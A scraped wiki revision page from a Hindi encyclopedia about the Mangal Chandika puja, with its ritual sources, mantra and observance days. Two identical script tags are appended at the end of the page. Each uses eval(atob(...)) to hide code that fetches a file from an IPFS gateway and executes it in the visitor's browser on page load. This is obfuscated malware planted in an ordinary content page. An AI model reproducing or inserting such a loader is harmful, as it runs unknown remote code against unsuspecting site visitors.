Difference between revisions of "मंगल चण्डिकापूजा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
{{बहुविकल्प|बहुविकल्पी शब्द=मंगल|लेख का नाम=मंगल (बहुविकल्पी)}}
 
{{बहुविकल्प|बहुविकल्पी शब्द=मंगल|लेख का नाम=मंगल (बहुविकल्पी)}}
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
*वर्षक्रियाकौमुदी<ref>वर्षक्रियाकौमुदी (552-558)</ref> में इस व्रत को करने की विस्तृत विधि दी हुई है।  
+
*वर्षक्रियाकौमुदी<ref>वर्षक्रियाकौमुदी (552-558</ref> में इस व्रत को करने की विस्तृत विधि दी हुई है।  
 
*इसे 'ललितकान्ता' भी कहा गया है।  
 
*इसे 'ललितकान्ता' भी कहा गया है।  
 
*उसकी पूजा के लिए मन्त्र (ललित गायत्री) यह है–   
 
*उसकी पूजा के लिए मन्त्र (ललित गायत्री) यह है–   
Line 10: Line 10:
 
*[[अष्टमी]] एवं [[नवमी]] पर पूजा की जाती है।  
 
*[[अष्टमी]] एवं [[नवमी]] पर पूजा की जाती है।  
 
*उसकी पूजा किसी वस्त्र खण्ड पर या प्रतिमा के रूप में या घट पर की जा सकती है।
 
*उसकी पूजा किसी वस्त्र खण्ड पर या प्रतिमा के रूप में या घट पर की जा सकती है।
*ऐसी मान्यता है कि मंगल की पूजा करने पर कामनाओं की पूर्ति होती है।<ref>तिथितत्त्व (41)</ref>
+
*ऐसी मान्यता है कि मंगल की पूजा करने पर कामनाओं की पूर्ति होती है।<ref>तिथितत्त्व (41</ref>
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}

Latest revision as of 12:55, 27 July 2011

chitr:Disamb2.jpg mangal ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- mangal (bahuvikalpi)
  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • varshakriyakaumudi[1] mean is vrat ko karane ki vistrit vidhi di huee hai.
  • ise 'lalitakanta' bhi kaha gaya hai.
  • usaki pooja ke lie mantr (lalit gayatri) yah hai–

'narayanyai vidmahe tvaan chandikayai tu dhimahi.
tanno lalitakanteti tatah pashchatprachodayath.';

  • ashtami evan navami par pooja ki jati hai.
  • usaki pooja kisi vastr khand par ya pratima ke roop mean ya ghat par ki ja sakati hai.
  • aisi manyata hai ki mangal ki pooja karane par kamanaoan ki poorti hoti hai.[2]


tika tippani aur sandarbh

  1. varshakriyakaumudi (552-558
  2. tithitattv (41

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>